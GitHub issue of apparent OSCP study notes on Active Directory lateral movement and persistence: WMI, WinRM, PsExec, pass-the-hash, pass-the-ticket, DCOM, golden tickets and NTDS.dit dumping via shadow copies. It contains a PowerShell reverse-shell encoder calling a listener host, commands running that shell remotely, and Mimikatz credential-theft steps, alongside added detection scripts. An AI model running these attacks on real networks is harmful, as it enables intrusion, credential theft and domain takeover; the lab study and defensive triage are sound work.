WDavid404 / OSCP


23. Lateral Movement in Active Directory #24

Open WDavid404 opened 4 months ago

WDavid404 commented 4 months ago

23.1. Active Directory Lateral Movement Techniques

23.1.1. WMI and WinRM

The first lateral movement technique we are going to cover is based on Windows Management Instrumentation (WMI), which is an object-oriented feature that facilitates task automation.

WMI communicates through Remote Procedure Calls (RPC) over port 135 for remote access and uses a higher-range port (19152-65535) for session data.

To create a process on the remote target via WMI, we need the credentials of a member of the Administrators local group, which can also be a domain user. In the following examples, we are going to perform the attacks as the user jen, which is both a domain user and a member of the Local Administrator group for the target machines.

Running the wmic utility to spawn a process on a remote system.

C:\Users\jeff>wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 752;
        ReturnValue = 0;
};

The WMI job returned the PID of the newly created process and a return value of "0", meaning that the process has been created successfully. On the target machine, in Task Manager, we would see the win32calc.exe process appear with jen as the user.

Because the wmic utility has been deprecated, we next try to achieve the same result with PowerShell commands: creating the PSCredential object in PowerShell.

$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options 
$command = 'calc';

Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

The result of running the PowerShell above:

ProcessId ReturnValue PSComputerName
--------- ----------- --------------
     3712           0 192.168.50.73

On the target machine, we can see the new process (screenshot).

To further improve our craft, let's replace the previous payload with a full reverse shell written in PowerShell. The encode.py file:

import sys
import base64

# PowerShell reverse shell one-liner; 192.168.118.2:443 is the Kali listener used in this walkthrough
payload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.118.2",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

# PowerShell's -e flag expects base64 of the UTF-16LE script; encode('utf16') prepends a 2-byte BOM, which [2:] strips
cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)

Once we have saved the Python script, we can run it and retrieve the output to use later.

kali@kali:~$ python3 encode.py
powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAU...
OwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA

The above generates an encoded PowerShell payload.

After setting up a Netcat listener on port 443 on our Kali machine, we can move on to client74 and run the PowerShell WMI script with the newly generated encoded reverse shell payload.

PS C:\Users\jeff> $username = 'jen';
PS C:\Users\jeff> $password = 'Nexus123!';
PS C:\Users\jeff> $secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
PS C:\Users\jeff> $credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

PS C:\Users\jeff> $Options = New-CimSessionOption -Protocol DCOM
PS C:\Users\jeff> $Session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options

PS C:\Users\jeff> $Command = 'powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5AD...
HUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA';

PS C:\Users\jeff> Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

ProcessId ReturnValue PSComputerName
--------- ----------- --------------
     3948           0 192.168.50.73

On the nc listener, we get a reverse shell from the target machine...

WinRM

As an alternative method to WMI for remote management, WinRM can be employed for remote host management. WinRM is the Microsoft version of the WS-Management protocol and it exchanges XML messages over HTTP and HTTPS. It uses TCP port 5986 for encrypted HTTPS traffic and port 5985 for plain HTTP. The winrs utility can be invoked by specifying the target host through the -r: argument, the username with -u: and the password with -p:.

C:\Users\jeff>winrs -r:files04 -u:jen -p:Nexus123!  "cmd /c hostname & whoami"
FILES04
corp\jen

To convert this technique into a full lateral movement scenario, we just need to replace the previous commands with the base64 encoded reverse-shell we wrote earlier.

C:\Users\jeff>winrs -r:files04 -u:jen -p:Nexus123!  "powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5AD...
HUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"

PowerShell also has WinRM built-in capabilities called PowerShell remoting, which can be invoked via the New-PSSession cmdlet by providing the IP of the target host along with the credentials in a credential object format similar to what we did previously.

PS C:\Users\jeff> $username = 'jen';
PS C:\Users\jeff> $password = 'Nexus123!';
PS C:\Users\jeff> $secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
PS C:\Users\jeff> $credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

PS C:\Users\jeff> New-PSSession -ComputerName 192.168.50.73 -Credential $credential

 Id Name            ComputerName    ComputerType    State         ConfigurationName     Availability
 -- ----            ------------    ------------    -----         -----------------     ------------
  1 WinRM1          192.168.50.73   RemoteMachine   Opened        Microsoft.PowerShell     Available

To interact with the session ID 1 we created, we can issue the Enter-PSSession cmdlet followed by the session ID.

PS C:\Users\jeff> Enter-PSSession 1
[192.168.50.73]: PS C:\Users\jen\Documents> whoami
corp\jen

[192.168.50.73]: PS C:\Users\jen\Documents> hostname
FILES04
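
Looking at the same encoded command from the defender's side, as an added example that is not part of these notes or the course material: the triage script below reverses what encode.py does, decoding the -e argument of a powershell command line (as it would appear in a process-creation log) back to UTF-16LE text and flagging substrings that merit a closer look. The indicator list and the sample command line are constructed for this example.

```python
import base64
import re
from typing import Optional

# Substrings an analyst commonly looks for in decoded PowerShell one-liners.
# The payload built by encode.py contains the first three; this list is a
# constructed heuristic for the example, not an exhaustive signature set.
INDICATORS = ("TCPClient", "GetStream", "iex ", "Invoke-Expression",
              "DownloadString", "-w hidden", "-nop")

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind powershell's -e argument, or None if there is none.

    PowerShell expects base64 of the UTF-16LE script, which is exactly what
    encode.py produces (encode('utf16')[2:] drops the BOM).
    """
    match = ENCODED_FLAG.search(cmdline)
    if match is None:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed blob: leave for manual review


def encode_command(script: str) -> str:
    """Build the same 'powershell -nop -w hidden -e <b64>' form encode.py emits."""
    blob = base64.b64encode(script.encode("utf-16-le")).decode()
    return "powershell -nop -w hidden -e " + blob


def triage(cmdline: str) -> dict:
    """Decode a logged command line and report which indicators it contains."""
    script = decode_encoded_command(cmdline)
    haystack = (cmdline + "\n" + (script or "")).lower()
    hits = [ind for ind in INDICATORS if ind.lower() in haystack]
    return {"encoded": script is not None, "script": script, "hits": hits}


# Constructed sample mirroring the shape of the page's payload (TEST-NET address)
SAMPLE_SCRIPT = ('$client = New-Object System.Net.Sockets.TCPClient("192.0.2.10",443);'
                 '$stream = $client.GetStream();iex $data')
SAMPLE_CMDLINE = encode_command(SAMPLE_SCRIPT)

if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINE)
    print("decoded:", result["script"])
    print("hits:", result["hits"])
```
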
WDavid404 commented 4 months ago

23.1.2. PsExec

PsExec is a very versatile tool that is part of the SysInternals suite developed by Mark Russinovich.

Three requisites:

To execute the command remotely, PsExec performs the following tasks:

Even though PsExec is not installed by default on Windows, we can easily transfer it to our compromised machine.

For this scenario, let's assume we have RDP access as the offsec local administrator on CLIENT74 as we already discovered its clear-text password on FILES04.

PS C:\Tools\SysinternalsSuite> ./PsExec64.exe -i  \\FILES04 -u corp\jen -p Nexus123! cmd

PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows [Version 10.0.20348.169]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>hostname
FILES04

C:\Windows\system32>whoami
corp\jen
WDavid404 commented 4 months ago

23.1.3. Pass the Hash

The Pass the Hash (PtH) technique allows an attacker to authenticate to a remote system or service using a user's NTLM hash instead of the user's plaintext password. Note that this will only work for servers or services using NTLM authentication, not for servers or services using Kerberos authentication. This lateral movement sub-technique is also mapped in the MITRE Framework under the Use Alternate Authentication Material general technique.

Tools: PsExec from Metasploit, the Passing-the-hash toolkit, Impacket

PtH has three prerequisites that must be met.

  1. It requires an SMB connection through the firewall (commonly port 445).
  2. The Windows File and Printer Sharing feature must be enabled. These requirements are common in internal enterprise environments.
  3. The admin share called ADMIN$ must be available. To establish a connection to this share, the attacker must present valid credentials with local administrative permissions. In other words, this type of lateral movement typically requires local administrative rights.

kali@kali:~$ /usr/bin/impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.50.73

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>hostname
FILES04

C:\>whoami
files04\administrator

This method works for Active Directory domain accounts and the built-in local administrator account. However, due to the 2014 security update, this technique cannot be used to authenticate as any other local admin account.

WDavid404 commented 4 months ago

23.1.4. Overpass the Hash

With overpass the hash, we can "over" abuse an NTLM user hash to gain a full Kerberos Ticket Granting Ticket (TGT). Then we can use the TGT to obtain a Ticket Granting Service (TGS).

To demonstrate this, let's assume we have compromised a workstation (or server) that jen has authenticated to. We'll also assume that the machine is now caching their credentials (and therefore, their NTLM password hash).

To simulate this cached credential, we will log in to the Windows 10 CLIENT76 machine as jeff and run a process as jen, which prompts authentication.

(screenshot of the authentication prompt)

From here, we enter jen as the username along with the associated password, which will launch Notepad in the context of that user. After successful authentication, jen's credentials will be cached on this machine.

The command below will dump the cached password hashes.

mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
...

This output shows jen's cached credentials under jen's own session. It includes the NTLM hash, which we will leverage to overpass the hash.

The essence of the overpass the hash lateral movement technique is to turn the NTLM hash into a Kerberos ticket and avoid the use of NTLM authentication. A simple way to do this is with the sekurlsa::pth command from Mimikatz.

mimikatz # sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell 
...

At this point, we have a new PowerShell session that allows us to execute commands as jen. Note: running the whoami command in the newly created PowerShell session would show jeff's identity instead of jen's. While this could be confusing, this is the intended behavior of the whoami utility, which only checks the current process's token and does not inspect any imported Kerberos tickets.

Let's list the cached Kerberos tickets with klist.

PS C:\Windows\system32> klist

No Kerberos tickets have been cached, but this is expected since jen has not yet performed an interactive login. Let's generate a TGT by authenticating to a network share on the files04 server with net use.

PS C:\Windows\system32> net use \\files04
The command completed successfully.

The output indicates that the net use command was successful. Now let's use the klist command to list the newly requested Kerberos tickets....

We have now converted our NTLM hash into a Kerberos TGT, allowing us to use any tools that rely on Kerberos authentication (as opposed to NTLM).

PS C:\Windows\system32> cd C:\tools\SysinternalsSuite\
PS C:\tools\SysinternalsSuite> .\PsExec.exe \\files04 cmd

PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows [Version 10.0.20348.169]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
corp\jen

C:\Windows\system32>hostname
FILES04
WDavid404 commented 4 months ago

23.1.5. Pass the Ticket

The Pass the Ticket attack takes advantage of the TGS, which may be exported and re-injected elsewhere on the network and then used to authenticate to a specific service. In addition, if the service tickets belong to the current user, then no administrative privileges are required.

In this scenario, we are going to abuse an already existing session of the user dave. The dave user has privileged access to the backup folder located on WEB04 whereas our logged-in user jen does not.

mimikatz #privilege::debug
Privilege '20' OK

mimikatz #sekurlsa::tickets /export

The above command parsed the LSASS process space in memory for any TGT/TGS, which are then saved to disk in the kirbi mimikatz format. We can verify the newly generated tickets with dir, filtering on the kirbi extension.

PS C:\Tools> dir *.kirbi

(screenshot: listing of the exported .kirbi files)

As many tickets have been generated, we can just pick any TGS ticket in the dave@cifs-web04.kirbi format and inject it through mimikatz via the kerberos::ptt command.

mimikatz # kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi

* File: '[0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi': OK

Confirm that the dave ticket has been successfully imported into our own session for the jen user.

PS C:\Tools> klist

Current LogonId is 0:0x13bca7

Cached Tickets: (1)

#0>     Client: dave @ CORP.COM
        Server: cifs/web04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40810000 -> forwardable renewable name_canonicalize
        Start Time: 9/14/2022 5:31:32 (local)
        End Time:   9/14/2022 15:31:13 (local)
        Renew Time: 9/21/2022 5:31:13 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

Then,

PS C:\Tools> ls \\web04\backup

    Directory: \\web04\backup

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/13/2022   2:52 AM              0 backup_schemata.txt

Yeah, we managed to successfully access the folder by impersonating dave's identity after injecting his authentication token into our user's process.

WDavid404 commented 4 months ago

23.1.6. DCOM

Both COM and DCOM are very old technologies dating back to the very first editions of Windows. Interaction with DCOM is performed over RPC on TCP port 135 and local administrator access is required to call the DCOM Service Control Manager, which is essentially an API.

Cybereason documented a collection of various DCOM lateral movement techniques, including one discovered by Matt Nelson, which we are covering in this section.

The discovered DCOM lateral movement technique is based on the Microsoft Management Console COM application that is employed for scripted automation of Windows systems.

We are going to demonstrate this lateral movement attack as the jen user logged in from the already compromised Windows 11 CLIENT74 host. The target IP of FILES04 is 192.168.50.73. Info: run the following commands in PowerShell.

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.50.73"))
$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")

Once we execute these two PowerShell lines from CLIENT74, we should have spawned an instance of the calculator app.

Because it runs within Session 0, we verify that the calculator app is running with tasklist, filtering the output with findstr (verifying that calculator is running on FILES04):

# On FILES04
C:\Users\Administrator>tasklist | findstr "calc"
win32calc.exe                 4764 Services                   0     12,132 K

We can now improve our craft by extending this attack to a full reverse shell similar to what we did in the WMI and WinRM section earlier in this Module.

$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5A...
AC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA","7")

Switching to our Kali machine, we can verify any incoming connections on the listener that we simultaneously set up.

kali@kali:~$ nc -lnvp 443
listening on [any] 443 ...
connect to [192.168.118.2] from (UNKNOWN) [192.168.50.73] 50778

PS C:\Windows\system32> whoami
corp\jen

PS C:\Windows\system32> hostname
FILES04
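
Each of the techniques in this and the previous comments leaves a characteristic parent process on the target: remote WMI process creation runs under WmiPrvSE.exe, WinRM and PowerShell remoting under wsmprovhost.exe, PsExec under its PSEXESVC.exe service, and the MMC20.Application DCOM method under mmc.exe. As an added example (not from these notes or the course), the script below classifies process-creation events by those parent/child pairs; the event field names and the sample events are assumptions constructed for this example.

```python
import re

# Parent image -> technique it is characteristic of. These are the well-known
# execution paths for the methods covered above; mmc.exe and WmiPrvSE.exe also
# have legitimate uses, so a finding is a lead for triage, not a verdict.
LATERAL_PARENTS = {
    "wmiprvse.exe":    "WMI Win32_Process.Create",
    "wsmprovhost.exe": "WinRM / PowerShell remoting",
    "psexesvc.exe":    "PsExec service",
    "mmc.exe":         "DCOM MMC20.Application ExecuteShellCommand",
}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# -e/-enc/-EncodedCommand followed by a long base64 blob, as encode.py produces
ENCODED = re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict):
    """Return a finding for one process-creation event, or None if nothing matches."""
    parent, image = _basename(event["parent_image"]), _basename(event["image"])
    reasons, technique = [], LATERAL_PARENTS.get(parent)
    if technique:
        reasons.append(f"spawned by {parent} ({technique})")
    if image == "psexesvc.exe":  # the service binary itself being started
        technique = technique or LATERAL_PARENTS["psexesvc.exe"]
        reasons.append("PSEXESVC.exe started on the host")
    if not reasons:
        return None
    severity = "high" if image in SHELLS else "medium"
    if ENCODED.search(event.get("command_line", "")):
        reasons.append("encoded PowerShell command line")
        severity = "critical"
    return {"host": event["host"], "user": event["user"], "image": image,
            "technique": technique, "severity": severity, "reasons": reasons}


def scan(events):
    """Run classify over a batch and keep only the events that produced a finding."""
    return [f for f in map(classify, events) if f is not None]


# Constructed sample events (Sysmon/4688-style fields, simplified for the example)
SAMPLE_EVENTS = [
    {"host": "FILES04", "user": "corp\\jen", "parent_image": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "image": "C:\\Windows\\System32\\win32calc.exe", "command_line": "calc"},
    {"host": "FILES04", "user": "corp\\jen", "parent_image": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell -nop -w hidden -e " + "QUFB" * 10},  # placeholder blob
    {"host": "FILES04", "user": "corp\\jen", "parent_image": "C:\\Windows\\System32\\wsmprovhost.exe",
     "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "cmd /c hostname & whoami"},
    {"host": "FILES04", "user": "NT AUTHORITY\\SYSTEM", "parent_image": "C:\\Windows\\System32\\services.exe",
     "image": "C:\\Windows\\PSEXESVC.exe", "command_line": "C:\\Windows\\PSEXESVC.exe"},
    {"host": "FILES04", "user": "corp\\jen", "parent_image": "C:\\Windows\\System32\\mmc.exe",
     "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "cmd /c calc"},
    {"host": "FILES04", "user": "corp\\jen", "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe", "command_line": "notepad"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["severity"], finding["technique"], finding["reasons"])
```
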
WDavid404 commented 4 months ago

23.2. Active Directory Persistence

23.2.1. Golden Ticket

When a user submits a request for a TGT, the KDC encrypts the TGT with a secret key known only to the KDCs in the domain. This secret key is the password hash of a domain user account called krbtgt.

If we can get our hands on the krbtgt password hash, we could create our own self-made custom TGTs, also known as golden tickets.

While Silver Tickets aim to forge a TGS ticket to access a specific service, Golden Tickets give us permission to access the entire domain's resources. For example, we could create a TGT stating that a non-privileged user is a member of the Domain Admins group, and the domain controller will trust it because it is correctly encrypted.

The best advantage is that the krbtgt account password is not automatically changed.

On DC1. Note: we need to log in to DC1 as a Domain Admins user to obtain the info needed to create the golden ticket. Run mimikatz:

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::lsa /patch
Domain : CORP / S-1-5-21-1987370270-658905905-1781884369 ==> needed later

...

RID  : 000001f6 (502)
User : krbtgt            ==> this is the account we are looking for
LM   :
NTLM : 1693c6cefafffc7af11ef34d1c788f47  ==> needed later
....

On CLIENT74 machine

## Before we generate the golden ticket 
## let's launch mimikatz and delete any existing Kerberos tickets 
## with kerberos::purge.
mimikatz # kerberos::purge
Ticket(s) purge for current session is OK

## Now, we'll supply the domain SID (which we can gather with whoami /user) 
## to the Mimikatz [kerberos::golden] command to create the golden ticket.
## 
## Let's set the golden ticket's username to jen. 
## Previously it didn't matter if the account existed.
## 
mimikatz # kerberos::golden /user:jen /domain:corp.com /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt
User      : jen
Domain    : corp.com (CORP)
SID       : S-1-5-21-1987370270-658905905-1781884369
User Id   : 500    ==> The user ID is set to 500 by default, which is the RID of the built-in administrator for the domain. 
Groups Id : *513 512 520 518 519  ==> the groups ID consist of the most privileged groups in Active Directory, including the Domain Admins group.
....

Golden ticket for 'jen @ corp.com' successfully submitted for current session

mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF665F1B800

With the golden ticket injected into memory, let's use PsExec from the command prompt we launched with misc::cmd.

C:\Tools\SysinternalsSuite>PsExec.exe \\dc1 cmd.exe

PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\Windows\system32>ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::5cd4:aacd:705a:3289%14
   IPv4 Address. . . . . . . . . . . : 192.168.50.70
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.50.254
C:\Windows\system32>whoami
corp\jen

C:\Windows\system32>whoami /groups
.....
CORP\Domain Admins   group
...

Note that by creating our own TGT and then using PsExec, we are performing the overpass the hash attack by leveraging Kerberos authentication as we discussed earlier in this Module.

If we were to connect PsExec to the IP address of the domain controller instead of the hostname, we would instead force the use of NTLM authentication and access would still be blocked.

C:\Tools\SysinternalsSuite> psexec.exe \\192.168.50.70 cmd.exe

PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

Couldn't access 192.168.50.70:
Access is denied.

Summary

In this section, we have demonstrated the golden ticket technique as a persistence mechanism. By obtaining the NTLM hash of the krbtgt user, we can issue domain-administrative TGTs to any existing low-privileged account. This allows us to obtain inconspicuous legitimate access to the entire AD domain.
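
Both the Pass the Ticket comment above (a cifs/web04 ticket for dave sitting in jen's session) and the golden ticket just shown leave traces in klist output on the host. As an added example that is not part of these notes or the course, the script below parses klist's cached-ticket listing and flags tickets whose client principal differs from the logged-on user, whose lifetime or renewal window exceeds the Windows defaults of 10 hours and 7 days (assumed here to be the domain policy), or which use RC4 in a domain assumed to run AES. The first sample ticket is the page's own dave ticket; the other two are constructed.

```python
import re
from datetime import datetime, timedelta

# Assumed domain policy: Windows defaults for max user ticket life and renewal life
MAX_TICKET_LIFE = timedelta(hours=10)
MAX_RENEW_LIFE = timedelta(days=7)
TIME_FMT = "%m/%d/%Y %H:%M:%S"
_FIELD = re.compile(r"^\s*(Client|Server|KerbTicket Encryption Type|Start Time|End Time|Renew Time):\s*(.+?)\s*$", re.M)


def _parse_time(value: str) -> datetime:
    return datetime.strptime(value.replace("(local)", "").strip(), TIME_FMT)


def parse_klist(text: str) -> list:
    """Split klist output into one dict per '#N>' cached-ticket entry."""
    tickets = []
    for chunk in re.split(r"^#\d+>", text, flags=re.M)[1:]:
        f = dict(_FIELD.findall(chunk))
        tickets.append({"client": f["Client"], "server": f["Server"],
                        "etype": f.get("KerbTicket Encryption Type", ""),
                        "start": _parse_time(f["Start Time"]), "end": _parse_time(f["End Time"]),
                        "renew": _parse_time(f["Renew Time"])})
    return tickets


def audit(tickets: list, session_user: str) -> list:
    """Return findings for tickets that look injected (PtT) or forged (golden/silver)."""
    findings = []
    for t in tickets:
        principal = t["client"].split("@")[0].strip().lower()
        reasons = []
        if principal != session_user.lower():
            reasons.append(f"ticket for {principal} in {session_user}'s session (pass-the-ticket pattern)")
        if t["end"] - t["start"] > MAX_TICKET_LIFE:
            reasons.append("lifetime exceeds max ticket life (forged-ticket pattern)")
        if t["renew"] - t["start"] > MAX_RENEW_LIFE:
            reasons.append("renew window exceeds max renewal life (forged-ticket pattern)")
        if "RC4" in t["etype"].upper():
            reasons.append("RC4 ticket in an AES domain (NTLM-derived key)")  # assumes AES-only policy
        if reasons:
            findings.append({"client": t["client"], "server": t["server"], "reasons": reasons})
    return findings


# Ticket #0 is the page's klist output; #1 (constructed) mimics a TGT forged from
# the NTLM/RC4 key with a ten-year lifetime; #2 (constructed) is a normal ticket.
SAMPLE_KLIST = """Current LogonId is 0:0x13bca7

#0>     Client: dave @ CORP.COM
        Server: cifs/web04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40810000 -> forwardable renewable name_canonicalize
        Start Time: 9/14/2022 5:31:32 (local)
        End Time:   9/14/2022 15:31:13 (local)
        Renew Time: 9/21/2022 5:31:13 (local)

#1>     Client: jen @ CORP.COM
        Server: krbtgt/CORP.COM @ CORP.COM
        KerbTicket Encryption Type: RC4-HMAC(NT)
        Start Time: 9/14/2022 5:35:00 (local)
        End Time:   9/11/2032 5:35:00 (local)
        Renew Time: 9/11/2032 5:35:00 (local)

#2>     Client: jen @ CORP.COM
        Server: cifs/files04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Start Time: 9/14/2022 5:40:00 (local)
        End Time:   9/14/2022 15:40:00 (local)
        Renew Time: 9/21/2022 5:40:00 (local)
"""

if __name__ == "__main__":
    for f in audit(parse_klist(SAMPLE_KLIST), "jen"):
        print(f["client"], "->", f["server"], f["reasons"])
```
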

WDavid404 commented 4 months ago

23.2.2. Shadow Copies

A Shadow Copy, also known as Volume Shadow Service (VSS) is a Microsoft backup technology that allows the creation of snapshots of files or entire volumes.

Tool: vshadow.exe

As domain admins, we can abuse the vshadow utility to create a Shadow Copy that will allow us to extract the Active Directory Database NTDS.dit database file. Once we've obtained a copy of the database, we need the SYSTEM hive, and then we can extract every user credential offline on our local Kali machine.

On Windows

## Note: cmd must be started as administrator for this to work; in PowerShell the copy command did not work.
## Run the vshadow utility with the -nw option to disable writers, which speeds up backup creation,
## and include the -p option to store the copy on disk.

C:\Tools>vshadow.exe -nw -p  C:
C:\Tools>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak

C:\>reg.exe save hklm\system c:\system.bak
The operation completed successfully.

On Kali

kali@kali:~$ impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL
...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
...

Note: the Administrator NTLM hash is the last field: 2892d26cdf84d7a70e2eb3b9f05c425e

We managed to obtain NTLM hashes and Kerberos keys for every AD user. We can now try to crack them or use them as-is in pass-the-hash attacks. For example, pass the hash with the Administrator NTLM hash above:

kali@kali:~$ impacket-wmiexec -hashes :2892d26cdf84d7a70e2eb3b9f05c425e Administrator@192.168.243.70

WDavid404 commented 4 months ago

More info https://github.com/WDavid404/Note_tryhackme/issues/1

WDavid404 commented 4 months ago

Questions

23.2.2 Q3

  1. RDP login to client74 with leon (he has administrator rights)
  2. mimikatz logonpasswords found no useful info
  3. On Kali, run crackmapexec smb ip_list -u leon -p 'HomeTaping199!' -d corp.com --continue-on-success; it shows leon is also an admin user on file04...
  4. RDP login directly to file04 with leon.

23.2.2 Q4

  1. On Kali: crackmapexec smb ip_list -u leon -p 'HomeTaping199!' -d corp.com --continue-on-success ==> leon is only an admin on client76
  2. RDP login to client76 with leon
  3. mimikatz sekurlsa::logonpasswords ==> shows info for dave and offsec
  4. sekurlsa::pth /user:dave /domain:corp.com /ntlm:08d7a47a6f9f66b97b1bae4178747494 /run:powershell
  5. In the newly launched PowerShell, run the following commands:
    
    net use \\web04 ==> success
    C:\tools\SysinternalsSuite> .\PsExec.exe \\web04 cmd   ==> failed
    ## To get a list of web04's shares, use this command (!!):
    net view \\web04 

![image](https://github.com/WDavid404/OSCP/assets/137129330/13b25ca6-d851-425b-96cc-47d0df8f9a30)

PS: the offsec user could not even run the first-line net use \\web04, so I gave up on it.

  6. ls \\web04\backup
  7. type \\web04\backup\proof.txt
WDavid404 commented 3 months ago

New tool: netexec

crackmapexec got deprecated, so my advice is to use both, just to make sure neither of them missed anything.

https://www.netexec.wiki/

Installation:

sudo apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec


After installation, open a new shell:

NetExec